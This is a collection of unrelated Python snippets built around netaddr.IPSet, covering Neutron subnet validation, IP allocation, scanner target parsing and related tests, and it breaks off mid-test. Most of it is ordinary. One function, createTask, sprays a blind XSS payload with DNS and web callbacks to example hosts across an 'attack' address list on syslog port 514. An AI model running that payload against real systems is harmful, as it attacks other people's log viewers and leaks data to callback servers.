def validate_allocation_pools(self, ip_pools, subnet_cidr):
    """Validate IP allocation pools.

    Verify start and end address for each allocation pool are valid,
    i.e., constituted by valid and appropriately ordered IP addresses.
    Also, verify pools do not overlap among themselves.
    Finally, verify that each range falls within the subnet's CIDR.
    """
    subnet = netaddr.IPNetwork(subnet_cidr)
    subnet_first_ip = netaddr.IPAddress(subnet.first + 1)
    # last address is broadcast in v4
    subnet_last_ip = netaddr.IPAddress(subnet.last - (subnet.version == 4))

    LOG.debug("Performing IP validity checks on allocation pools")
    ip_sets = []
    for ip_pool in ip_pools:
        start_ip = netaddr.IPAddress(ip_pool.first, ip_pool.version)
        end_ip = netaddr.IPAddress(ip_pool.last, ip_pool.version)
        if (start_ip.version != subnet.version or
                end_ip.version != subnet.version):
            LOG.info("Specified IP addresses do not match "
                     "the subnet IP version")
            raise n_exc.InvalidAllocationPool(pool=ip_pool)
        if start_ip < subnet_first_ip or end_ip > subnet_last_ip:
            LOG.info("Found pool larger than subnet "
                     "CIDR:%(start)s - %(end)s",
                     {'start': start_ip, 'end': end_ip})
            raise n_exc.OutOfBoundsAllocationPool(
                pool=ip_pool,
                subnet_cidr=subnet_cidr)
        # Valid allocation pool
        # Create an IPSet for it for easily verifying overlaps
        ip_sets.append(netaddr.IPSet(ip_pool.cidrs()))

    LOG.debug("Checking for overlaps among allocation pools "
              "and gateway ip")
    ip_ranges = ip_pools[:]

    # Use integer cursors as an efficient way for implementing
    # comparison and avoiding comparing the same pair twice
    for l_cursor in range(len(ip_sets)):
        for r_cursor in range(l_cursor + 1, len(ip_sets)):
            if ip_sets[l_cursor] & ip_sets[r_cursor]:
                l_range = ip_ranges[l_cursor]
                r_range = ip_ranges[r_cursor]
                LOG.info("Found overlapping ranges: %(l_range)s and "
                         "%(r_range)s",
                         {'l_range': l_range, 'r_range': r_range})
                raise n_exc.OverlappingAllocationPools(
                    pool_1=l_range,
                    pool_2=r_range,
                    subnet_cidr=subnet_cidr)
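# Hedged standalone sketch (not part of the function above): the pairwise
# overlap check relies on the intersection of two netaddr.IPSet objects
# being truthy only when the pools share at least one address. The pool
# values below are illustrative.
import netaddr

pool_a = netaddr.IPRange('192.0.2.10', '192.0.2.50')
pool_b = netaddr.IPRange('192.0.2.40', '192.0.2.60')
set_a = netaddr.IPSet(pool_a.cidrs())
set_b = netaddr.IPSet(pool_b.cidrs())
if set_a & set_b:
    # 192.0.2.40 - 192.0.2.50 is shared, so the intersection is non-empty
    print([str(c) for c in (set_a & set_b).iter_cidrs()])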
def _validate_subnet_cidr(context, network_id, new_subnet_cidr):
    """Validate the CIDR for a subnet.

    Verifies the specified CIDR does not overlap with the ones defined
    for the other subnets specified for this network, or with any other
    CIDR if overlapping IPs are disabled.
    """
    if neutron_cfg.cfg.CONF.allow_overlapping_ips:
        return

    new_subnet_ipset = netaddr.IPSet([new_subnet_cidr])
    # Using admin context here, in case we actually share networks later
    subnet_list = db_api.subnet_find(context.elevated(), None, None, None,
                                     False, network_id=network_id,
                                     shared=[False])
    for subnet in subnet_list:
        if (netaddr.IPSet([subnet.cidr]) & new_subnet_ipset):
            # don't give out details of the overlapping subnet
            err_msg = (_("Requested subnet with cidr: %(cidr)s for "
                         "network: %(network_id)s overlaps with another "
                         "subnet") %
                       {'cidr': new_subnet_cidr,
                        'network_id': network_id})
            LOG.error(_("Validation for CIDR: %(new_cidr)s failed - "
                        "overlaps with subnet %(subnet_id)s "
                        "(CIDR: %(cidr)s)"),
                      {'new_cidr': new_subnet_cidr,
                       'subnet_id': subnet.id,
                       'cidr': subnet.cidr})
            raise exceptions.InvalidInput(error_message=err_msg)
def from_dict(cls, username: str, config: dict):
    addresses = config.get("address", [])
    if not isinstance(addresses, list):
        addresses = [addresses]
    if len(addresses):
        prefixes = netaddr.IPSet()
        for a in addresses:
            prefixes.add(netaddr.IPNetwork(a))
    else:
        prefixes = None
    return cls(username=username,
               password_hash=config["password"],
               prefixes=prefixes)
def pools_to_ip_sets(_ip_pools, _ip_sets, _ip_ranges):
    def pools_to_ip_range(ip_pools):
        __ip_ranges = []
        for ip_pool in ip_pools:
            __ip_ranges.append(
                netaddr.IPRange(ip_pool['start'], ip_pool['end']))
        return __ip_ranges

    for ip_range in pools_to_ip_range(_ip_pools):
        _ip_sets.append(netaddr.IPSet(ip_range.cidrs()))
        _ip_ranges.append(ip_range)
    return _ip_sets
def ensure_default_policy(cidrs, subnets):
    policy_cidrs = netaddr.IPSet(cidrs)
    for subnet in subnets:
        subnet_cidr = netaddr.IPNetwork(subnet["cidr"])
        network_ip = subnet_cidr.network
        broadcast_ip = subnet_cidr.broadcast
        prefix_len = '32' if subnet_cidr.version == 4 else '128'
        default_policy_cidrs = ["%s/%s" % (network_ip, prefix_len),
                                "%s/%s" % (broadcast_ip, prefix_len)]
        for cidr in default_policy_cidrs:
            if (netaddr.IPNetwork(cidr) not in policy_cidrs and
                    cidr not in cidrs):
                cidrs.append(cidr)
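# Hedged sketch of the membership test used above: a /32 host entry for the
# network or broadcast address is only appended when it is not already
# covered by the policy IPSet. Addresses here are illustrative.
import netaddr

policy_cidrs = netaddr.IPSet(['10.0.0.0/30'])
candidate = netaddr.IPNetwork('10.0.0.0/32')                # network address as /32
print(candidate in policy_cidrs)                            # True - already covered
print(netaddr.IPNetwork('10.0.0.255/32') in policy_cidrs)   # False - would be appended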
def _validate_subnet_cidr(self, context, network, new_subnet_cidr):
    """Validate the CIDR for a subnet.

    Verifies the specified CIDR does not overlap with the ones defined
    for the other subnets specified for this network, or with any other
    CIDR if overlapping IPs are disabled. Does not apply to subnets with
    temporary IPv6 Prefix Delegation CIDRs (::/64).
    """
    new_subnet_ipset = netaddr.IPSet([new_subnet_cidr])
    # Disallow subnets with prefix length 0 as they will lead to
    # dnsmasq failures (see bug 1362651).
    # This is not a discrimination against /0 subnets.
    # A /0 subnet is conceptually possible but hardly a practical
    # scenario for neutron's use cases.
    for cidr in new_subnet_ipset.iter_cidrs():
        if cidr.prefixlen == 0:
            err_msg = _("0 is not allowed as CIDR prefix length")
            raise n_exc.InvalidInput(error_message=err_msg)

    if cfg.CONF.allow_overlapping_ips:
        subnet_list = network.subnets
    else:
        subnet_list = self._get_all_subnets(context)
    for subnet in subnet_list:
        if ((netaddr.IPSet([subnet.cidr]) & new_subnet_ipset) and
                subnet.cidr != constants.PROVISIONAL_IPV6_PD_PREFIX):
            # don't give out details of the overlapping subnet
            err_msg = (_("Requested subnet with cidr: %(cidr)s for "
                         "network: %(network_id)s overlaps with another "
                         "subnet") %
                       {'cidr': new_subnet_cidr,
                        'network_id': network.id})
            LOG.info(_LI("Validation for CIDR: %(new_cidr)s failed - "
                         "overlaps with subnet %(subnet_id)s "
                         "(CIDR: %(cidr)s)"),
                     {'new_cidr': new_subnet_cidr,
                      'subnet_id': subnet.id,
                      'cidr': subnet.cidr})
            raise n_exc.InvalidInput(error_message=err_msg)
def _updated_subnetpool_dict(self, model, new_pool):
    updated = {}
    new_prefixes = new_pool.get('prefixes', attributes.ATTR_NOT_SPECIFIED)
    orig_prefixes = [str(x.cidr) for x in model['prefixes']]
    if new_prefixes is not attributes.ATTR_NOT_SPECIFIED:
        orig_set = netaddr.IPSet(orig_prefixes)
        new_set = netaddr.IPSet(new_prefixes)
        if not orig_set.issubset(new_set):
            msg = _("Existing prefixes must be "
                    "a subset of the new prefixes")
            raise n_exc.IllegalSubnetPoolPrefixUpdate(msg=msg)
        new_set.compact()
        updated['prefixes'] = [str(x.cidr) for x in new_set.iter_cidrs()]
    else:
        updated['prefixes'] = orig_prefixes

    for key in ['id', 'name', 'ip_version', 'min_prefixlen',
                'max_prefixlen', 'default_prefixlen', 'shared',
                'default_quota']:
        self._write_key(key, updated, model, new_pool)

    return updated
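# Hedged illustration of the subset rule enforced above: an update may only
# grow a subnet pool, so the original prefixes must be a subset of the new
# ones, and compact() merges adjacent or overlapping CIDRs before they are
# stored. Prefix values are made up.
import netaddr

orig_set = netaddr.IPSet(['10.10.10.0/24'])
new_set = netaddr.IPSet(['10.10.0.0/16', '192.168.0.0/24'])
print(orig_set.issubset(new_set))   # True - update allowed
print(new_set.issubset(orig_set))   # False - would shrink the pool
new_set.compact()
print([str(c) for c in new_set.iter_cidrs()])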
def login():
    if octoprint.server.userManager is not None \
            and "user" in request.values.keys() \
            and "pass" in request.values.keys():
        username = request.values["user"]
        password = request.values["pass"]

        if "remember" in request.values.keys() \
                and request.values["remember"] == "true":
            remember = True
        else:
            remember = False

        user = octoprint.server.userManager.findUser(username)
        if user is not None:
            if octoprint.server.userManager.checkPassword(username, password):
                login_user(user, remember=remember)
                identity_changed.send(current_app._get_current_object(),
                                      identity=Identity(user.get_id()))
                return jsonify(user.asDict())
        return make_response(("User unknown or password incorrect", 401, []))
    elif "passive" in request.values.keys():
        user = current_user
        if user is not None and not user.is_anonymous():
            identity_changed.send(current_app._get_current_object(),
                                  identity=Identity(user.get_id()))
            return jsonify(user.asDict())
        elif s().getBoolean(["accessControl", "autologinLocal"]) \
                and s().get(["accessControl", "autologinAs"]) is not None \
                and s().get(["accessControl", "localNetworks"]) is not None:
            autologinAs = s().get(["accessControl", "autologinAs"])
            localNetworks = netaddr.IPSet([])
            for ip in s().get(["accessControl", "localNetworks"]):
                localNetworks.add(ip)

            try:
                remoteAddr = util.getRemoteAddress(request)
                if netaddr.IPAddress(remoteAddr) in localNetworks:
                    user = octoprint.server.userManager.findUser(autologinAs)
                    if user is not None:
                        login_user(user)
                        identity_changed.send(
                            current_app._get_current_object(),
                            identity=Identity(user.get_id()))
                        return jsonify(user.asDict())
            except:
                logger = logging.getLogger(__name__)
                logger.exception(
                    "Could not autologin user %s for networks %r"
                    % (autologinAs, localNetworks))
    return NO_CONTENT
def test_get_null_routes_addresses(self, get_method):
    url, region = "TEST_URL", "TEST_REGION"
    ipset = netaddr.IPSet(netaddr.IPNetwork(self.cidr))
    payload = [{
        "status": "1",
        "note": None,
        "updated": None,
        "name": None,
        "status_name": None,
        "region.id": region,
        "ip": None,
        "idql": None,
        "discovered": None,
        "netmask": None,
        "tag": None,
        "conf": None,
        "cidr": self.sub_cidr,
        "id": None,
        "switch.hostname": None,
    }]
    body = [{
        "paginate": {
            "total_count": len(payload),
            "total_count_display": None,
            "total_pages": None,
            "author_comment": None,
            "per_page": None,
            "page": None
        },
        "request": None,
        "payload": payload,
        "response": None
    }]
    get_method.return_value.json.return_value = body
    addresses = null_routes.get_null_routes_addresses(url, region, ipset)
    get_method.assert_called_once_with(url, verify=False)
    self.assertEqual(addresses,
                     netaddr.IPSet(netaddr.IPNetwork(self.sub_cidr)))
def initialize(self, host, bridge_manager, config):
    LOG.info("Initializing the Endpoint File Manager. \n %s", config)
    self.epg_mapping_file = os.path.join(config['epg_mapping_dir'],
                                         FILE_NAME_FORMAT)
    self.vrf_mapping_file = os.path.join(config['epg_mapping_dir'],
                                         VRF_FILE_NAME_FORMAT)
    self.lbiface_mapping_file_fmt = os.path.join(
        config['epg_mapping_dir'], LBIFACE_FILE_NAME_FORMAT)
    self.file_formats = [self.epg_mapping_file,
                         self.vrf_mapping_file,
                         self.lbiface_mapping_file_fmt]
    self.uplink_intf_name = config['nested_domain_uplink_interface']
    self.dhcp_domain = config['dhcp_domain']
    self.es_port_dict = {}
    self.vrf_dict = {}
    self.vif_to_vrf = {}
    self._load_es_next_hop_info(config['external_segment'])
    self.int_fip_alloc = {4: {}, 6: {}}
    self.int_fip_pool = {
        4: netaddr.IPSet(config['internal_floating_ip_pool']),
        6: netaddr.IPSet(config['internal_floating_ip6_pool'])}
    if ofcst.METADATA_DEFAULT_IP in self.int_fip_pool[4]:
        self.int_fip_pool[4].remove(ofcst.METADATA_DEFAULT_IP)
    self.snat_iptables = snat_iptables_manager.SnatIptablesManager(
        bridge_manager)
    self._registered_endpoints = set()
    self._stale_endpoints = set()
    self.vif_int_dict = {}
    self._setup_ep_directory()
    self.host = host
    self.nat_mtu_size = config['nat_mtu_size']
    self.bridge_manager = bridge_manager
    self.nested_domain_uplink_interface = (
        config['nested_domain_uplink_interface'])
    return self
def allocate_address(cls, pool, dbapi=None, order=None):
    """Allocates the next available IP address from a pool."""
    if not dbapi:
        dbapi = pecan.request.dbapi

    # Build a set of defined ranges
    defined = netaddr.IPSet()
    for (start, end) in pool.ranges:
        defined.update(netaddr.IPRange(start, end))

    # Determine which addresses are already in use
    addresses = dbapi.addresses_get_by_pool(pool.id)
    inuse = netaddr.IPSet()
    for a in addresses:
        inuse.add(a.address)

    # Calculate which addresses are still available
    available = defined - inuse
    if available.size == 0:
        raise exception.AddressPoolExhausted(name=pool.name)

    if order is None:
        order = pool.order

    # Select an address according to the allocation scheme
    return cls._select_address(available, order)
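# Hedged sketch of the set arithmetic used above: the pool's configured
# ranges form one IPSet, the allocated addresses another, and their
# difference is what remains available. Ranges and addresses below are
# illustrative.
import netaddr

defined = netaddr.IPSet()
defined.update(netaddr.IPRange('192.0.2.10', '192.0.2.20'))
inuse = netaddr.IPSet(['192.0.2.10', '192.0.2.11'])
available = defined - inuse
print(available.size)              # 9 addresses left
print(next(iter(available)))       # lowest free address: 192.0.2.12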
def get_targets(file):
    root = get_root_element(file)
    targets = netaddr.IPSet()
    for preference in root.findall(
            ".//Preferences/ServerPreferences/preference"):
        if preference[0].tag == "name" and preference[0].text == "TARGET":
            for target in map(str.strip, preference[1].text.split(sep=",")):
                if "-" not in target:
                    targets.add(target)
                else:
                    ip_range = target.split(sep="-")
                    targets.add(netaddr.IPRange(ip_range[0], ip_range[1]))
    return targets
def enable(self, enable_list=None):
    '''Set active set of connections via list of fnmatch/IP patterns to
    limit run_command; pass in None to reset to enable all connections'''
    self.disabled = set()
    if enable_list is None:
        self.console.q.put(
            (('ENABLED', True),
             'All %d hosts currently enabled' % len(self.connections)))
        return
    if isinstance(enable_list, basestring):
        # Handle single value being passed instead of list
        enable_list = [enable_list]

    # Assemble an enabled list, then complement it at the end
    enabled = set()
    for pattern in enable_list:
        direct_match = self.locate(pattern)
        if direct_match:
            enabled.add(direct_match)
            continue
        # Try using pattern as IP network or glob first
        # if it doesn't look like either, then treat it as a name wildcard
        pattern_match = set()
        try:
            ip_match = netaddr.IPNetwork(pattern)
        except Exception as e:
            try:
                ip_match = netaddr.IPSet(netaddr.IPGlob(pattern))
            except Exception as e:
                ip_match = None
        for host, t in self.connections.items():
            if ip_match:
                try:
                    if netaddr.IPAddress(t.getpeername()[0]) in ip_match:
                        pattern_match.add(host)
                except Exception as e:
                    pass
            else:
                if fnmatch.fnmatch(str(host), pattern):
                    pattern_match.add(host)
        if len(pattern_match) > 1:
            self.console.q.put(
                (('ENABLED', True),
                 'Pattern wildcard "%s" matched %d hosts' %
                 (pattern, len(pattern_match))))
        enabled.update(pattern_match)

    # Take complement of enabled set
    for host in self.connections:
        if host not in enabled:
            self.disabled.add(host)
    self.console.q.put(
        (('ENABLED', True),
         '%d hosts currently enabled' % len(enabled)))
def run(self):
    results = []
    targets = netaddr.IPSet()

    for target in self.include:
        if self.isIpAddress(target):
            self.logger.debug("Including: %s" % target)
            targets.add(target)
        elif self.isCidr(target):
            self.logger.debug("Including: %s" % target)
            targets.add(target)
        elif self.isRange(target):
            target = target.replace(' ', '')
            self.logger.debug("Including: %s" % target)
            parts = target.split('-')
            range = netaddr.IPRange(parts[0], parts[1])
            for cidr in range.cidrs():
                targets.add(cidr)

    for target in self.exclude:
        if target not in targets:
            #self.logger.debug("%s not found in target set", target)
            continue
        if self.isIpAddress(target):
            self.logger.debug("Excluding %s" % target)
            targets.remove(target)
        elif self.isCidr(target):
            self.logger.debug("Excluding %s" % target)
            targets.remove(target)
        elif self.isRange(target):
            target = target.replace(' ', '')
            self.logger.debug("Excluding %s" % target)
            parts = target.split('-')
            range = netaddr.IPRange(parts[0], parts[1])
            for cidr in range.cidrs():
                targets.remove(cidr)

    targets.compact()

    if self.enumerate is True:
        for target in targets:
            results.append(str(target))
    else:
        for target in targets.iter_cidrs():
            results.append(str(target))

    if self.format == 'json':
        print json.dumps(results)
    elif self.format == 'csv':
        print ','.join(results)
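# Hedged mini-example of the include/exclude flow above: ranges are expanded
# to CIDRs on the way in, removed on the way out, and compact() re-merges
# whatever is left before output. Values below are illustrative.
import netaddr

targets = netaddr.IPSet()
for cidr in netaddr.IPRange('198.51.100.0', '198.51.100.15').cidrs():
    targets.add(cidr)
targets.remove('198.51.100.7')
targets.compact()
print([str(c) for c in targets.iter_cidrs()])   # remaining CIDR blocks
print(targets.size)                             # 15 addresses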
def createTask(self):
    # Here goes example xss/dns payload
    # Listen for the logs of the ns server
    # Prepare www server for callbacks
    dnsServer = 'nsserv.example.com'
    webServer = 'web.example.com'
    examplePayload = ("%s'\"><img/src=//%s." + dnsServer +
                      "><img/src=//" + webServer + "/1.png?%s><")
    payload = self.payload or examplePayload
    print("Using payload: %s" % payload)
    attackNetworkList = [netaddr.IPNetwork(networkCidr)
                         for networkCidr in self.cidrNetworkList]
    network = netaddr.IPSet(attackNetworkList)
    print("Total attack len: %s" % len(network))
    attackTargetList = [
        {'ipaddress': "%s" % ipAddress,
         'port': 514,
         'payload': self.payload or (payload % (self.idGenerator(),
                                                ipAddress, ipAddress))}
        for ipAddress in network]
    return attackTargetList
def get_subnet_scope(self, tenant, network, cidr):
    scope = None
    cidr = netaddr.IPNetwork(cidr)
    if self.source:
        def_scope, tenant_cons, net_cons = (
            self.source.get_subnet_constraints(tenant, network))
        scope = def_scope or scope
        for constraints in [net_cons, tenant_cons]:
            if constraints:
                # scope is deny if there is any overlap with deny set
                # scope is public/private if subset of public/private set
                if netaddr.IPSet(cidr) & (constraints.get('deny') or
                                          netaddr.IPSet()):
                    return SCOPE_DENY
                elif cidr in (constraints.get('private') or
                              netaddr.IPSet()):
                    return SCOPE_PRIVATE
                elif cidr in (constraints.get('public') or
                              netaddr.IPSet()):
                    return SCOPE_PUBLIC
                elif constraints.get('default'):
                    return constraints.get('default')
    return scope
def enrich(
    alert: dict,
    search_window_hours: int,
    vpn_ip_cidrs: types.List[str],
    search_fn: types.Callable[[SearchQuery], types.List[dict]],
) -> dict:
    '''Search for events that describe an assignment of a VPN IP address
    to the sourceipaddress in an alert.
    '''
    details = alert.get('details', {})

    source_ip = details.get('sourceipaddress')
    if source_ip is None:
        return alert

    if netaddr.IPAddress(source_ip) not in netaddr.IPSet(vpn_ip_cidrs):
        return alert

    search_vpn_assignment = SearchQuery({
        'hours': search_window_hours,
    })
    search_vpn_assignment.add_must([
        TermMatch('tags', 'vpn'),
        TermMatch('tags', 'netfilter'),
        TermMatch('details.success', 'true'),
        TermMatch('details.vpnip', source_ip),
        PhraseMatch('summary', 'netfilter add upon connection'),
    ])

    assign_events = sorted(
        [hit.get('_source', {}) for hit in search_fn(search_vpn_assignment)],
        key=lambda evt: toUTC(evt['utctimestamp']),
        reverse=True,  # Sort into descending order from most recent to least.
    )

    if len(assign_events) == 0:
        return alert

    event = assign_events[0]

    details['vpnassignment'] = {
        'username': event['details']['username'],
        'originalip': event['details']['sourceipaddress'],
    }
    alert['details'] = details

    return alert
def setTarget(self, target):
    ipSet = netaddr.IPSet()
    try:
        if target.find('-') >= 0:
            parts = target.split('-')
            range = netaddr.IPRange(parts[0], parts[1])
            for cidr in range.cidrs():
                ipSet.add(cidr)
                self.target.append(cidr)
        else:
            ipSet.add(target)
            self.target.append(target)
    except netaddr.core.AddrFormatError:
        return False
def ip_from_string(string):
    """
    Takes a string and extracts all valid IP addresses as a set of strings,
    using the validate_ip helper function.

    :param string: Any string of data
    :return: IP addresses as a netaddr.IPSet, or an empty netaddr.IPSet if
        none are found
    """
    ip_regex = re.compile(r'(?:[0-9]{1,3}\.){3}[0-9]{1,3}(?:\/[0-9]{1,2})?')
    potential_ips = ip_regex.findall(string)
    valid_ips = []

    for ip in potential_ips:
        if validate_ip(ip) is True:
            valid_ips.append(ip)

    return netaddr.IPSet(valid_ips)
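# Hedged usage sketch for the extractor above, assuming the external
# validate_ip helper accepts the dotted-quad strings (with optional /prefix)
# matched by the regex:
#
#   text = "hosts 10.0.0.1 and 10.0.0.2, plus the 192.0.2.0/24 block"
#   found = ip_from_string(text)
#   print(found.size)                                  # two hosts plus the /24
#   print(netaddr.IPAddress('192.0.2.17') in found)    # True - covered by the /24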
def test_auto_refresh(self):
    self._write_constraints_file(self.file_data)
    ncs = anc.ConfigFileSource(self.cons_file_name)
    self.assertEqual(
        (anc.SCOPE_PUBLIC,
         {'public': netaddr.IPSet(['10.20.0.0/16']),
          'default': 'private'},
         {'default': 'deny'}),
        ncs.get_subnet_constraints('t1', 'net3'))
    time.sleep(0.1)
    data = self.file_data.replace('subnet_scope = public',
                                  'subnet_scope = deny')
    data = data.replace('t1/net3', 't2/net3')
    self._write_constraints_file(data)
    self.assertEqual(
        (anc.SCOPE_DENY,
         {'public': netaddr.IPSet(['10.20.0.0/16']),
          'default': 'private'},
         {}),
        ncs.get_subnet_constraints('t1', 'net3'))
    self.assertEqual(
        (anc.SCOPE_DENY, {}, {'default': 'deny'}),
        ncs.get_subnet_constraints('t2', 'net3'))
def validate_cidr(self, cidr):
    test_cidr_set = netaddr.IPSet([cidr])
    all_subnets = self.list_subnets()
    all_subnet_ips = [sn['allocation_pools'] for sn in all_subnets]
    for idx, subnet_ip_list in enumerate(all_subnet_ips):
        for subnet_ip_range in subnet_ip_list:
            test_range = netaddr.IPRange(subnet_ip_range['start'],
                                         subnet_ip_range['end'])
            for ip in test_range:
                if ip in test_cidr_set:
                    raise Exception(
                        "Overlap detected for CIDR %s and Subnet %s" %
                        (cidr, all_subnets[idx]))
    return True
def _check_policy_rules_overlap(self, context, ipsec_site_conn):
    """Validate that no policy rules overlap.

    The NSX does not support overlapping policy rules across all
    tenants and tier0 routers.
    """
    connections = self.vpn_plugin.get_ipsec_site_connections(
        context.elevated())
    if not connections:
        return
    vpnservice_id = ipsec_site_conn.get('vpnservice_id')
    vpnservice = self.vpn_plugin._get_vpnservice(context, vpnservice_id)
    local_cidrs = [vpnservice['subnet']['cidr']]
    peer_cidrs = ipsec_site_conn['peer_cidrs']
    for conn in connections:
        # skip this connection and connections in non active state
        if (conn['id'] == ipsec_site_conn.get('id') or
                conn['status'] != constants.ACTIVE):
            continue
        # TODO(asarfaty): support peer groups too
        # check if it overlaps with the peer cidrs
        conn_peer_cidrs = conn['peer_cidrs']
        if netaddr.IPSet(conn_peer_cidrs) & netaddr.IPSet(peer_cidrs):
            # check if the local cidr also overlaps
            con_service_id = conn.get('vpnservice_id')
            con_service = self.vpn_plugin._get_vpnservice(
                context.elevated(), con_service_id)
            conn_local_cidr = [con_service['subnet']['cidr']]
            if netaddr.IPSet(conn_local_cidr) & netaddr.IPSet(local_cidrs):
                msg = (_("Cannot create a connection with overlapping "
                         "local and peer cidrs (%(local)s and %(peer)s) "
                         "as connection %(id)s") %
                       {'local': local_cidrs,
                        'peer': peer_cidrs,
                        'id': conn['id']})
                raise nsx_exc.NsxVpnValidationError(details=msg)
def test__get_targets_call(self):
    multiple_targets = self.uut.get_targets(self.internal_targets_xml)
    self.assertEqual(len(multiple_targets.iter_cidrs()), 9)
    self.assertEqual(netaddr.IPNetwork("10.10.10.0/8"),
                     multiple_targets.iter_cidrs()[0])
    self.assertEqual(netaddr.IPNetwork("192.168.1.1/32"),
                     multiple_targets.iter_cidrs()[1])
    self.assertEqual(netaddr.IPNetwork("192.168.2.10/31"),
                     multiple_targets.iter_cidrs()[2])
    self.assertEqual(netaddr.IPNetwork("192.168.2.12/30"),
                     multiple_targets.iter_cidrs()[3])
    self.assertEqual(netaddr.IPNetwork("192.168.2.16/28"),
                     multiple_targets.iter_cidrs()[4])
    self.assertEqual(netaddr.IPNetwork("192.168.2.32/27"),
                     multiple_targets.iter_cidrs()[5])
    self.assertEqual(netaddr.IPNetwork("192.168.2.64/28"),
                     multiple_targets.iter_cidrs()[6])
    self.assertEqual(netaddr.IPNetwork("192.168.2.80/29"),
                     multiple_targets.iter_cidrs()[7])
    self.assertEqual(netaddr.IPNetwork("192.168.2.88/32"),
                     multiple_targets.iter_cidrs()[8])

    ip_set = netaddr.IPSet()
    for n in range(9, 90, 1):
        ip_set.add(f"192.168.2.{n}")
    check_set = netaddr.IPSet()
    for cidr in multiple_targets.iter_cidrs()[-7:]:
        check_set.add(cidr)
    for ip in ip_set:
        if str(ip) == "192.168.2.9" or str(ip) == "192.168.2.89":
            self.assertFalse(ip in check_set)
        else:
            self.assertTrue(ip in check_set)
def create_route(context, route):
    LOG.info("create_route for tenant %s" % context.tenant_id)
    if not route:
        raise n_exc.BadRequest(resource="routes", msg="Malformed body")
    route = route.get("route")
    if not route:
        raise n_exc.BadRequest(resource="routes", msg="Malformed body")
    for key in ["gateway", "cidr", "subnet_id"]:
        if key not in route:
            raise n_exc.BadRequest(resource="routes",
                                   msg="%s is required" % key)

    subnet_id = route["subnet_id"]
    with context.session.begin():
        subnet = db_api.subnet_find(context, id=subnet_id,
                                    scope=db_api.ONE)
        if not subnet:
            raise n_exc.SubnetNotFound(subnet_id=subnet_id)

        if subnet["ip_policy"]:
            policies = subnet["ip_policy"].get_cidrs_ip_set()
        else:
            policies = netaddr.IPSet([])

        alloc_pools = allocation_pool.AllocationPools(subnet["cidr"],
                                                      policies=policies)
        try:
            alloc_pools.validate_gateway_excluded(route["gateway"])
        except neutron_exc.GatewayConflictWithAllocationPools as e:
            LOG.exception(str(e))
            raise n_exc.BadRequest(resource="routes", msg=str(e))

        # TODO(anyone): May want to denormalize the cidr values into columns
        # to achieve single db lookup on conflict check
        route_cidr = netaddr.IPNetwork(route["cidr"])
        subnet_routes = db_api.route_find(context, subnet_id=subnet_id,
                                          scope=db_api.ALL)

        quota.QUOTAS.limit_check(context, context.tenant_id,
                                 routes_per_subnet=len(subnet_routes) + 1)

        for sub_route in subnet_routes:
            sub_route_cidr = netaddr.IPNetwork(sub_route["cidr"])
            if sub_route_cidr.value == DEFAULT_ROUTE.value:
                continue
            if route_cidr in sub_route_cidr or sub_route_cidr in route_cidr:
                raise q_exc.RouteConflict(route_id=sub_route["id"],
                                          cidr=str(route_cidr))
        new_route = db_api.route_create(context, **route)
    return v._make_route_dict(new_route)
def get_utilization(self):
    """Get the child prefix size and parent size.

    For Prefixes with a status of "container", get the number of child
    prefixes. For all others, count child IP addresses.

    Returns:
        UtilizationData (namedtuple): (numerator, denominator)
    """
    if self.status == Prefix.STATUS_CONTAINER:
        queryset = Prefix.objects.net_contained(
            self.prefix).filter(vrf=self.vrf)
        child_prefixes = netaddr.IPSet([p.prefix for p in queryset])
        return UtilizationData(numerator=child_prefixes.size,
                               denominator=self.prefix.size)
    else:
        # Compile an IPSet to avoid counting duplicate IPs
        child_count = netaddr.IPSet(
            [ip.address.ip for ip in self.get_child_ips()]).size
        prefix_size = self.prefix.size
        if (self.prefix.version == 4 and self.prefix.prefixlen < 31
                and not self.is_pool):
            prefix_size -= 2
        return UtilizationData(numerator=child_count,
                               denominator=prefix_size)
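# Hedged sketch of the deduplication trick above: building an IPSet from the
# child addresses collapses duplicates, so .size counts each IP once even if
# it appears on several objects. Addresses below are illustrative.
import netaddr

child_ips = ['10.0.0.5', '10.0.0.5', '10.0.0.6']   # duplicate on purpose
print(len(child_ips))                               # 3 entries
print(netaddr.IPSet(child_ips).size)                # 2 unique addresses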
def test_create_port_json(self):
    keys = [('admin_state_up', True),
            ('status', self.port_create_status)]
    with self.port(name='myname') as port:
        for k, v in keys:
            self.assertEqual(port['port'][k], v)
        self.assertIn('mac_address', port['port'])
        ips = port['port']['fixed_ips']
        self.assertEqual(1, len(ips))
        subnet_db = directory.get_plugin().get_subnet(
            context.get_admin_context(), ips[0]['subnet_id'])
        self.assertIn(netaddr.IPAddress(ips[0]['ip_address']),
                      netaddr.IPSet(netaddr.IPNetwork(subnet_db['cidr'])))
        self.assertEqual('myname', port['port']['name'])
        self._verify_dns_assigment(port['port'],
                                   ips_list=[ips[0]['ip_address']])
def _test_allow_allocation_pool_identity(self, conf_flag):
    CONF.set_override('allow_allocation_pool_growth', conf_flag, 'QUARK')
    cidr = "192.168.1.0/24"
    ip_network = netaddr.IPNetwork(cidr)
    network = dict(name="public", tenant_id="fake", network_plugin="BASE")
    network = {"network": network}
    pool = [dict(start='192.168.1.15', end='192.168.1.30')]
    subnet = dict(id=1, ip_version=4, next_auto_assign_ip=2,
                  cidr=cidr, first_ip=ip_network.first,
                  last_ip=ip_network.last, ip_policy=None,
                  allocation_pools=pool, tenant_id="fake")
    subnet = {"subnet": subnet}
    with self._stubs(network, subnet) as (net, sub1):
        subnet = subnet_api.get_subnet(self.context, 1)
        start_pools = subnet['allocation_pools']
        new_pool = [dict(start='192.168.1.15', end='192.168.1.30')]
        start_ip_set = netaddr.IPSet()
        for rng in start_pools:
            start_ip_set.add(netaddr.IPRange(rng['start'], rng['end']))
        new_ip_set = netaddr.IPSet()
        for rng in new_pool:
            new_ip_set.add(netaddr.IPRange(rng['start'], rng['end']))
        self.assertTrue(start_ip_set == new_ip_set)
        subnet_update = {"subnet": dict(allocation_pools=new_pool)}
        subnet = subnet_api.update_subnet(self.context, 1, subnet_update)
        self.assertEqual(start_pools, subnet['allocation_pools'])
        self.assertEqual(new_pool, subnet['allocation_pools'])
def test_create_locks_address_doesnt_exist(self):
    network = db_api.network_create(self.context)
    subnet = db_api.subnet_create(
        self.context, network=network, cidr=self.cidr, ip_version=4)
    self.context.session.flush()
    addresses = netaddr.IPSet(netaddr.IPNetwork(self.sub_cidr))
    null_routes.create_locks(self.context, [network.id], addresses)
    address = db_api.ip_address_find(
        self.context, subnet_id=subnet.id, scope=db_api.ONE)
    self.assertIsNotNone(address)
    self.assertIsNotNone(address.lock_id)
def test_aggregating_flows_for_addresses(self):
    # add one address
